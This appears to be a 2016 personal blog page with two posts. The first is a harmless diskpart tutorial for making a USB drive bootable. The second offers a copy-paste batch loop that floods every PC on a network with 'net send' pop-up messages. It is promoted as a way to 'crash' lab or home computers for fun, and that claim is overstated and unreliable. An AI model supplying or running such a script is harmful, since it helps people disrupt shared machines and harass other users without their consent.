Saturday 28 May 2016

How to make a pendrive/other removable drive bootable without any software.

If you have a bootable image file of an Operating System that you want to install in your PC and you don't want to waste a DVD by burning the image, using it once and then throwing it off you can use a removable storage device like a pen drive to install the OS. To do so, follow these steps:-

  1. First of all copy the contents of the pen drive to your PC so that you don't lose them.
  2. Open CMD
  3. Type the following commands one by one.
Diskpart
List disk
 
     4.  Now check which of the drive you want to use (usually it is drive 1 if you haven't plugged any other device)
   
Select disk (number)
Clean
Create partition primary
Format fs=fat32

This will take some time and when it is done you have to copy the image file to the pen drive.

Now plug the pen drive to the PC and boot it as you generally use a DVD to install the OS.

Sunday 8 May 2016

How to crash all PC on a network

Are you bored up doing your computer job on a network or are you unable to complete the assignments given in the computer lab. If the case is anything like this or you just want to have fun crashing all PCs on a home network you are at the correct place cause this is where I m gonna give you the simple 3 line copy-paste code.
Though you could simply copy the code below but if you wanna know how it works then here is the line-wise description.

:net
rem the line 1 declares a checkpoint that will be used later.
Net send * (Crashed Ya baby)
rem line 2 is the line that keeps sending messages to all PCs on the network
goto net
rem line 3 makes the program start from ":net" checkpoint which makes the message pop up infinite times.

Copy the code above and paste it on a notepad file and name it whatever.bat

If you encounter any issues with this please lemme know at akhandyadav.com@gmail.com
Or
The comment box is there forever.